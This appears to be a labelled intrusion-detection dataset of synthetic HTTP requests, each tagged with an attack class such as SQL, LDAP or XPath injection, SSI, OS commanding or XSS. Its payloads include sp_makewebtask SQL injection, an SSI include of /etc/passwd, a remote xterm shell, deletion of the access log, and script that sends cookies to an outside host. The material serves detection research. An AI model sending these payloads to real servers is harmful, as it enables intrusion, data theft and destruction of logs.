GET /@45ZDbc/sbaH4.A.51.m_/nk1GCuMQX/is.gif?pcrn1he1Oi=bdats&iHeIGsktiiyAk=t%40vmwlW&fhlaiedpwaiP=%3B%253&ohnc=Les&GzOHIvbscripti=OR++++%27iaeg%27+++%3D++N%27++%27&8yrrLe=884468&AsDzjcaeri=varAaeih5len+T%40%27t&an=9&elii=93&nvaca=e402&slwasnaorlo6=nKV7l1T&RIMCCdocumentrand5=i&ngHwn72er=lhawhzQ%2F5ttnc&a0hoS=nDqaULUEcOHw HTTP/1.1
Host: 83.80.27.51:80
Connection: gt5a
Accept: video/*, audio/*;q=0.6, audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, identity, compress
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 67.105.71.5
Cookie: pttenn=8
Cookie2: $Version="1"
Date: Fri, 22 Apr 05 02:51:36 GMT
ETag: W/"xjhXd_c7iQOU03vuzK4B"
Expect: 100-continue
From: meCo6@c0Onn.it
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Oct 04 15:27:40 UTC
Max-Forwards: 412
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Basic SHRmZWdtOnNkd2RsMw==
Range: -67
Referer: http://www.rkEnf.biz/oscaa.bin
TE: gzip
Trailer: Upgrade
User-Agent: slii (t4z7x3@m; mH@Hff4sHU; ua3oAlYL; oBnuZUxE0J)
UA-CPU: 68000
UA-Disp: 678,1314,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 1.0 www.lbur.html, e5soa2/7.9 www.fo4k2w.htm
Transfer-Encoding: gzip
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35407
Start - Id: 42453
class: SqlInjection
GET /enanm06tihAetyost/r1uSchvrlks/9aav0aainetdha/Idafhop/xX8/istaeDolsMn/e8Tw.js?sthedleoeaiulbx=eer66thinput&ztNre6iomdg=47&mee=60963&veee=nPe7_&pt=gOprCfFJ&Hasan2=78449790&ezfehN6sM=zc5sTg&zxvyiaeq2e=8&ul=itmir&em49e=qwer%27+++or+++hs_v.Account%3D%27sias%40lc4PI.com HTTP/1.0
Host: 38.120.150.79
Connection: tqadI
Accept: text/xml, video/*
Accept-Charset: x-mac-japanese, windows-1255;q=0.7, cp-950, iso-2022-kr
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 220.25.102.83
Cookie: cnitateaHfn=iatsdxkn;boxOwcpTa8c38=xizd;IYTsamA5M4httpGI=)whereTlr;o6taaau=2827480716
Cookie2: $Version="574"
Date: Sun, 21 May 06 04:10:31 GMT
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 100-continue
From: Oselc@mtgpaa.net
If-Modified-Since: Thu, 21 Aug 08 14:28:31 GMT
If-Unmodified-Since: Mon, 21 Sep 09 18:58:06 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Sep 07 11:57:41 CET
Max-Forwards: 289
MIME-Version: 0.7
Pragma: ebeE=lb9hcCeo
Proxy-Authorization: Digest realm
Authorization: sslt Eskt=oit2itS
Range: 6369-,501-7998
Referer: http://Swei.ch/vulco0i.jpg
TE: trailers,chunked,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 2.0; eg-fc; rv:0.2.0) Gecko/11900993
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2020x4204
Via: 5.0 238.192.156.98, HTTP/3.1 167.187.221.23, 6.4 146.3.39.250:67951
Transfer-Encoding: nr0ezU; ailhlHlb=snir
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 574567754776356
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42453
Start - Id: 43203
class: OsCommanding
GET /qrgecebajiTiemfimaEe/udMIr./rWwkN6sz4FiYNB/BXPoX4RfxBO/nWnLcUfHr4Ik6BX/fswesdt.shtml?anyuaGr=%5Cr+++++xterm++++-display++165.6.249.40%3A0.0&pnQHEwyb96=08153915&ceftee2k=he%3Ca&yl2cme=recma1Ltqdbjh&TSfcc=1308&cieeEesR=dtot5 HTTP/1.0
Host: www.v2tbtha.be:80
Connection: sapdXeae
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 79.214.12.199
Cookie: xeetpptfrikma=442;ganoobosn=updateWe6lntan;C5wccatnn=oy_
Cookie2: $Version="48"
Date: Sun, 19 Jun 05 08:41:34 UTC
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: yrpSi=owua7S;pnehhdsv
From: eena@eaooz.de
If-Modified-Since: Sat, 19 Aug 06 22:28:22 UTC
If-Unmodified-Since: Mon, 02 Mar 09 24:20:08 GMT
If-Match: "VebZXtG9cBXZ1bB-YyE@"
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: Fri, 19 Aug 05 20:15:09 GMT
Max-Forwards: 3928
MIME-Version: 7.7
Pragma: erat='uuinktm'
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: NTLM MmJ5d2V0RTJ2bmlzbmFjcmllaWU4ZGVhdGVzQW9vc29zbnNzdHB1ZGg=
Range: 704-945122,63-330705
Referer: /liranr/tmlae/rrhn/zdae/ipTgvFsn.exe
TE: chunked;q=0.1,chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: aph5/7.6
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 953x846
Via: HTTP/6.1 200.202.172.26:89, 1.6 www.atx6os.html
Transfer-Encoding: mhetxa
Upgrade: hi11/1.2
Warning: 254 www.o7hkelz.js:8351 "etdelrar1" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43203
Start - Id: 37002
class: LdapInjection
GET /loenra4mhToshzc0nfl/rAOEdzZ39sCJ/seaooao4tiQwreo3.jpg?eeyo2dwlNhqdmoe=a%7C&ezwvRndtaaOun=1&ei2awtLioe=4o5tnl&peomi=475&OA1160LFQ=oformo&AnsheAo5=ntasdilc2mn&h0oz5i=25606&cV5O=66926&sdIo=staiEk&owtge=tt%3F%24&dr7zfnsaat5op=aeParwsoen5nnc&hoAumc=9ehsfb5Phse3gvA&RITLqrk=sew&s8bLbi=00&%uWp@o=%29+++%28%7C%28fr%3Drt*%29 HTTP/1.0
Host: www.ehm1o6ua.net
Connection: teiro
Accept: */*;q=0.3
Accept-Charset: x-mac-korean;q=0.5, cp-936;q=0.1, windows-1251, us-ascii;q=0.1, us-ascii;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=12152
Client-ip: 134.238.253.203
Cookie: tIaorttv2sblc=xr9-rt;s8orP=191325;ar69tfrrq=t7;sab6r0hwt5hLIn=ttinsertu twuhs5;pycdataydIt=e8Le0/eoutbhns
Cookie2: $Version="554"
Date: Sat, 13 Sep 08 10:30:06 UTC
ETag: W/"90Qjiqk4A1FWruj"
Expect: 100-continue
From: 4taAnee@sfR4.cz
If-Modified-Since: Thu, 07 Aug 08 21:19:57 CET
If-Unmodified-Since: Mon, 13 Mar 06 04:50:08 GMT
If-Match: "wLNlIO_94_ATAtujxx"
If-None-Match: "@Liv3KcL1H4ePPjoX"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 06
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: VoiE eezne=thIO
Range: 11-,-9658
Referer: http://h7hahti.net/hota.cgi
TE: gzip;q=0.0
Trailer: If-Match
User-Agent: k6cbmoldeeeptsobEarc
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-Color: color32
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37002
Start - Id: 40784
class: SSI
GET /mfd9ehrzt/Hrftmo89anusesiphed.css?FvbscriptWx5Ob8shutdownx=91&hlAueybs=419&FOLSG=%3C%21--%23odbc+statement+%3D+%22select++++isotEoua%2C++++msd%2C++++hot4n+++++from+++tweoperter+++++order+++by++2%2C+++++22%2C+++++0%22+--%3E&ebee=4h9&C.8Qprocessing-instructionexec=77775&Acdenz=dbyamtscgcng HTTP/1.1
Host: 124.236.39.110:80
Connection: oyin
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 6ledrnt-CtO
Cache-Control: no-cache
Client-ip: 79.174.208.245
Cookie: cxgzeocnEe1v7rf=sh 5vrnadAs7snd;rmerUdies7i=?;GsrdsvEh1ca=hstety;tsirnEinm=108;hrP=12602782
Date: Tue, 04 May 04 12:38:38 GMT
ETag: W/"n6Vs6wO0z4ETSDqV3lL-"
If-Modified-Since: Thu, 20 Sep 07 20:26:35 CET
If-Unmodified-Since: Mon, 23 Aug 04 19:05:01 GMT
If-None-Match: *
If-Range: "wuFa@D5QvVREvWeYw"
Max-Forwards: 614
Pragma: heseaoy0='ilrtlAe'
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest algorithm=MD5
Range: 317784-4,80-130,625-44564
Referer: /nfrEEauh/6Teoa.gif
TE: trailers,gzip
Trailer: Trailer
User-Agent: nlefi3m3 (s4W63E; lkj@hc; iJRFV7Py)
UA-Pixels: 4833x5333
Via: FTP/9.1 www.Ilrsrsti.tiff, amn/6.1 www.neenrna6.htm
Transfer-Encoding: compress
Upgrade: vgs/0.3
X-Serial-Number: 87018152344
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40784
Start - Id: 46910
class: XSS
POST /4ndbatntU/te71gteue/h6anetkAv/yuq0/ot68eyvIieve5/TS6nGccIr/iehg/Ovhzuadheee4xreQ/ssrMZopaBj6PllsqiA.shtml? HTTP/1.1
Content-Length: 203
Content-Language: peait,s
Content-Encoding: compress
Content-Location: /wj95togn/3ti2h.sh
Content-MD5: c2E5bnJkTml1ZEVzb2d0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sun, 07 Sep 08 01:09:45 UTC
Host: www.9tlf5ds.org
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: co6Tvbi-itisiit6
Cache-Control: wu=hto2ar
Client-ip: 44.189.197.231
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Sun, 25 Nov 07 15:13:24 GMT
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: 100-continue
From: 8se9efj@lkeeudtih.com
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Wed, 28 Apr 04 01:03:42 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Sep 09 22:30:12 CET
Max-Forwards: 0120
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM cmw1YXRhNmVhdHRFdG5taGRwdDJuaGhud3VGc2VtZWpjZXY3aWlz
Range: -790
Referer: http://9hw6ei.com/Srn3/8gdn7le/booialol.mpeg
TE: deflate,chunked;q=0.2
Trailer: Range
User-Agent: akf4OXAC http://www.Hngo1nss.net
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8473x700
Via: dtrhlb/5.0 159.117.136.254, 8.9 www.H9ien.jpg
Transfer-Encoding: 2gtilt
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

itrwicmiuw=[\xC0][\xBC]script>[document.location.replace  ('http://www.anlitela.com/cgi-bin/tetreschch.cgi'+document.cookie);][\xC0][\xBC]/script >

End - Id: 46910
Start - Id: 39693
class: SSI
GET /r7h1vaaTui/e3Sirkidocdt86ae0no/n3hO/igCU2jKxBL_R.jpeg?tuScEiahr8c=eto&_WPY@hEqmiG=738524&1tA94zqi2bnsrwu=%3C%21--%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&6C.bBBcQ0Vk=le%2Bu HTTP/1.0
Host: 117.119.53.176
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: 0Anan0o-za;q=0.6, 2ogionk-rd3yg, ocettnjs-4tttypkv
Cache-Control: an5j=nn
Client-ip: 170.88.156.59
Cookie: d2eqar1=oidernc;agTnuOe=psh9i;sra9ke5=bK7ZIo;edaort=nLahZMcYNYd7;ieegRrlD1dasMau=tY-.METMCSl;reedyr7oeoibo5=I/ehm
Cookie2: $Version="38"
Date: Thu, 31 Aug 06 13:18:53 CET
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Thu, 05 Mar 09 18:55:28 CET
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: "JlTHvga7O0Z4Aw8@GZs"
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ddEF82d6
Authorization: Digest algorithm=MD5
Range: 11490-87515,-392,063833-721563
Referer: http://www.jnpqie.net/srsutue/aro3/vat1n.php4
TE: gzip;q=0.7,deflate;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 0.2; gd-ah; rv:3.0.2) Gecko/12334068
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/8.3 108.142.84.77, HTTP/2.6 www.snyJdio.js
Transfer-Encoding: gzip
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39693
Start - Id: 50096
class: XPathInjection
PUT /rxhupIEyFa/1r7w@tPKLY/Rwinnttmpy9c3NtNMU2Y/BtpgSJajxng/isdW7ibhtle.jpeg? HTTP/1.1
Content-Length: 195
Content-Language: heen
Content-Encoding: deflate
Content-Location: http://ioesss.it/diit/baqneEi/usNdeJ1/1se58.mpeg
Content-MD5: bXpsZWVvaU54VmFUOGRraQ==
Content-Type: application/x-www-form-urlencoded
Host: www.AIgGuR.net
Connection: keep-alive
Accept: audio/*, video/*;q=0.1
Accept-Charset: iso-8859-5, ks_c_5601-1987;q=0.1, hz-gb-2312, euc-jp;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Cookie: ttFi=mrGjhs'  or     path/child::node()[position()=N]    or    'cSeCh'    =   ';ath2uec=optNa9 3be247uao
Cookie2: $Version="419"
Date: Sun, 11 Jul 04 23:24:57 UTC
If-Modified-Since: Tue, 08 Nov 05 06:38:05 GMT
If-Unmodified-Since: Wed, 12 Oct 05 01:41:59 GMT
If-Match: "RHcOKMBkKey-25rLYfC"
If-None-Match: *
If-Range: "QPZ9Fmn1mI2zBPln"
Max-Forwards: 264
Pragma: no-cache
Proxy-Authorization: Basic dXBhclRqQTpoYm0yenN0
Authorization: Basic VHBzOXU6YXRyc2lDQ3I=
Referer: http://urjpd.uk/yogat9se/ttwna8yO/nqanl/rmfaihs.php3
User-Agent: Mozilla/8.7 (X11; U; Solaris 6.1; ai-eH; rv:6.9.0) Gecko/71455527
UA-Color: color16
Via: FTP/2.4 169.31.105.140
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nWotggur2slsss3=eoGYtKT_Z5M&eowaRnr=919658&ksl81rtltck=9240&t4=816808&eyttoan=8urrixx-e&epassthruD4NNX.=eC.KojmwgS&bRCmrmr=aesr&ahheolcmu=m/;i&omparurse=Slibgoueeridocument(rs&IXutTJMOY=onr

End - Id: 50096
Start - Id: 42918
class: OsCommanding
GET /s6nnAn8raie/lqo3Rwz5G-HfMvv/eWlU/lAlocation/CnQ0arbino-object/vxH/sld0Aaye3ittituAax8.swf?hip7ST=%7C%3Ay&io=ai&0ag=5 HTTP/1.1
Host: www.NnriatA3an.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: %0arm   -f   /var/log/httpd/access_log ;
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 216.204.56.99
Cookie: IXGaPoIbdx=2y.S1S;3moei= iframegcf;KB3K6O4A3Gb=l3FHUQ5Eon;tlrnutelotyt=7eme;tttnrvHeNy=r75UbI
Cookie2: $Version="1"
Date: Sat, 08 Apr 06 20:17:00 CET
ETag: "fGDyc.eSYO13Beqenk@m"
Expect: 100-continue
If-Modified-Since: Tue, 10 Feb 09 06:46:32 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "egwlNH@JjxVbFnFOZN"
If-None-Match: "U0UpltYSMzFfyXQ333"
If-Range: Mon, 09 Nov 09 12:49:17 GMT
Max-Forwards: 3
MIME-Version: 4.5
Pragma: 7dsxn=tide
Proxy-Authorization: Digest realm
Authorization: a4dL haem4n=0she
Range: 761836-
Referer: /Ehlyaq8/Ettew6/shueAi/ioseIwrg.jsp
TE: chunked,chunked
Trailer: Pragma
User-Agent: Mozilla/3.1 (X11; U; Linux i386 7.7; rc-rD; rv:6.9.4) Gecko/53885087
UA-CPU: Sparc
UA-Disp: 0478,435,16
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/8.8 186.54.26.152, 2.0 www.aieeiolT.tiff, 5.3 235.102.137.209:46775
Transfer-Encoding: gzip
Upgrade: L8ahqe/3.3, eola/5.9, onhrln/4.6, iticp/3.3, rnsA6/2.5
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Forwarded-For: 214.193.235.54
X-Serial-Number: 71827

null

End - Id: 42918
Start - Id: 41079
class: SqlInjection
GET /caK7I5aDeEi/oM0alfecIomoroedn/tti/tfmhltrtSQi6osea2fip/nna3zR4U9ca9U/sLhP3UrI@BjW4Bk.Lint/aehr/lRMi42UYO1.tiff?f@JIBEgCIF=%27%3B+++++EXEC+++++master.dbo.sp_makewebtask++%27c%3A%5Cinetpub%5Cwwwroot%5CoR.jpeg%27%2C++++%27SELECT+++Aan+++++FROM+++++wfl+WHERE+++xtype%3D%27%27U%27%27%27&rehr=bt4yIhm&r2xedtfys=r&sPIaC@BPF1=Ierrspsehijnl HTTP/1.1
Host: 218.48.94.196:1
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=3404
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="633"
Date: Sun, 02 Aug 09 02:39:34 CET
ETag: "6r-fYwsYHOv4rS21"
Expect: todx=mj6wd7;rmdo
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 29 Nov 04 23:14:53 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: *
If-None-Match: "Kp2pS1G@tfT7YH6"
If-Range: Mon, 28 Apr 08 11:28:12 UTC
Max-Forwards: 711
MIME-Version: 7.6
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 000-,-068966
Referer: /t2fsdEto/2delqrwe/07t8.mp3
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: 9IdfCED http://www.tpak.cz
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: hdDi/1.9 www.32ztm39u.jpg:13328, 9.3 44.84.62.7, ewl/1.6 218.202.17.43
Transfer-Encoding: compress
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41079
Start - Id: 42713
class: SqlInjection
POST /st_FvHJA/uZq2M/h3rwrfenear/axhv7ycia/aRy7Q24Bf/6ztes1vycurfsem.shtml? HTTP/1.0
Content-Length: 9
Content-Language: oozrna,ntE,Uevte6h
Content-Encoding: deflate
Content-Location: /eSrs/wnA5c/vEnt.wmn
Content-MD5: aDk2c2NFSG84dG9lMnRTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 20 Nov 04 06:01:27 UTC
Host: 123.101.0.251
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 34.238.18.93
Cookie: rc=lhtoe i6;sysxOarmA5t=execy-
Cookie2: $Version="70"
Date: Thu, 24 Sep 09 12:48:46 CET
ETag: W/"O9kcnRqr.hXbx6V_il8"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Mon, 21 May 07 18:31:47 CET
If-Unmodified-Since: Wed, 13 Jun 07 21:03:15 GMT
If-Match: *
If-None-Match: *
If-Range: "VSSNq6eG_kOiND2I8"
Max-Forwards: 20
MIME-Version: 9.7
Pragma: otv='doiza'
Proxy-Authorization: Basic MnI0YWlEbDI6b0k4bg==
Authorization: ey5sgA ogyer0T0=aetoe
Range: 30889-130,957-,45-484050
Referer: http://www.o1ioep.net/5dnee/lAoesEdj.avi
TE: trailers
Trailer: TE
User-Agent: ' OR   'EEmk5abaEint'     BETWEEN  'R' AND   'T
UA-Disp: 030,9561,32
UA-OS: Mac OS X
UA-Color: color16
Via: 3.2 171.201.248.242:982, zse/8.7 www.sxve.js, t5geal/4.9 www.O7crnge.html
Transfer-Encoding: 5retfe; iyicdta=mahetiw
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 096 162.11.120.83 "m8Bjnanad" "Wed, 04 Mar 09 18:39:09 GMT"
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

k6Win=SCh

End - Id: 42713
Start - Id: 48029
class: XSS
GET /c3n3J3v8GOIWl2y/yPkaynAaoautol6/l_GKO-k/smmensiaOahmfoc/@o/j0Lecge2e/aIDUrvSeWWO/g3Uc0/4sTestt8nntLnja3Sto/UW/aesekAaE/fM6jRGg1aWrOg.FCWs.shtml?tIqOroeot2b4s=%3Cdiv+style+%3D++%22+++++behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.la.com%2Fscript%2Fi9eS2uls.cfm%5D%29%3B++++%22++++%3E HTTP/1.1
Host: 79.205.142.73:67
Connection: close
Accept: image/jpeg, application/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: identity, compress;q=0.1, identity;q=0.3, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 27.19.82.202
Cookie: nlriraT=e
Cookie2: $Version="31"
Date: Sat, 07 Mar 09 09:28:22 UTC
ETag: W/"pd.LTRlV-ZS9kKW08_J"
Expect: npRl7Nrr
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 13 Oct 07 06:38:52 UTC
If-Unmodified-Since: Thu, 27 Oct 05 09:03:19 UTC
If-Match: "S.nRc04N49Vf4mCbUJLt"
If-None-Match: "rKtUV-y03H5wic6G3M8W"
If-Range: Sat, 24 May 08 17:20:03 GMT
Max-Forwards: 8
MIME-Version: 4.1
Pragma: pLtssn='atoef'
Proxy-Authorization: NTLM b2NpZWRtaHRvc090d2Vld282bXRobnNrcmR0ZXR0UmQ1aWFzc3Q=
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: -605,08388-217,461352-2
Referer: http://www.olnb.cz/tnqkae4.asp
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 3.3; np-tS; rv:6.5.8) Gecko/33107531
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 717x263
Via: 4.5 www.thza.shtml, HTTP/8.2 www.bsomepyt.jpg, 9.8 www.TsiM.tiff
Transfer-Encoding: compress
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48029
Start - Id: 37962
class: LdapInjection
GET /3sue/r7.dueCEL/s21/t7fiW8JtQiQMJAznoM.tiff?c83gabodanlLp=re&BlihoSa=30&TOnd2AhnuoDU=210&Ufp=985593102&tskuagabrc=or%29%28+%7C++%28nOqe%3D*%29&bheybrreq=ne&tt2picaeuRqt=l%5Db%24t%40fe&FxHmy37486v=0&RoirkSpozauptTp=olinhfrelxa8ync&ieaunljd=sock_stream2h5eml%29stae8ot&a1odh=6ge%271awgetr+sl%244%28&f6Lh9lh4nApft=%3Ai%40+&2b0e5pwuati=e%5Dalfromec&ai0es=auhOTiro4I HTTP/1.1
Host: 164.124.250.159
Connection: keep-alive
Accept: text/plain;q=0.3
Accept-Charset: x-mac-turkish;q=0.4, iso-8859-7
Accept-Encoding: compress;q=0.6, identity
Accept-Language: ri-ubv8;q=0.2, 2-p;q=0.6, tsR7hie-96lC5de;q=0.7, lmein-lAeuanv;q=0.2, hypoGrad-or1oe;q=0.0
Cache-Control: no-cache
Client-ip: 177.141.172.83
Cookie: yaabistglStt=jbN;jefQQGZnhg=na
Cookie2: $Version="12"
Date: Mon, 12 Sep 05 17:44:29 UTC
ETag: "uFJw6.PG8Rdmb4i"
Expect: psersns=esanan
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Mon, 19 Jan 09 24:06:48 CET
If-Unmodified-Since: Fri, 04 Sep 09 14:04:45 UTC
If-Match: "Zd.LX6.txXMsGynC"
If-None-Match: "16GEyzl.qkhY@m5DfNc"
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 184
MIME-Version: 8.4
Pragma: upmui=a3yvt
Proxy-Authorization: Digest qop=auth
Authorization: ndeT l2ftnt=toae
Range: -8,482604-
Referer: http://www.maesht.it/sgeu/6heasR3/shje/citer/zh3NEs.wav
TE: trailers,trailers
Trailer: Warning
User-Agent: hnoeboila
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 6.4 www.u9ig.gif, 8.1 www.osrte.png, 3.9 110.173.46.242
Transfer-Encoding: identity
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37962
Start - Id: 49537
class: XPathInjection
GET /teavhlnjarthcft/isoyshht4txexp/erz_dbkDpis/un/eiM1hmm/acbyq4yv7/exDnYCQp6Idxt/Oosqtn3Igss.jpg?oyniwSdQisse3hd=udsU%2Bw5didf&4BCD0qYiframeK=7&u2oq1zrot1da=lIuoreeZd&nbeeuownE=h&9lia=4&helakdoosdTaUes=egsoLne2delelti&tongdeoahruet6=03764221&bstmhds=5isee%27++or+++++1%3C++++gwdt7%2Fso9r%2FfFdtmy%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D980%5D++or++%27zkIitkp%27++++%3D+%27&h0s7Oss=betweenozfhat+&5Net=er%3F%5Bofnnfthgnts HTTP/1.1
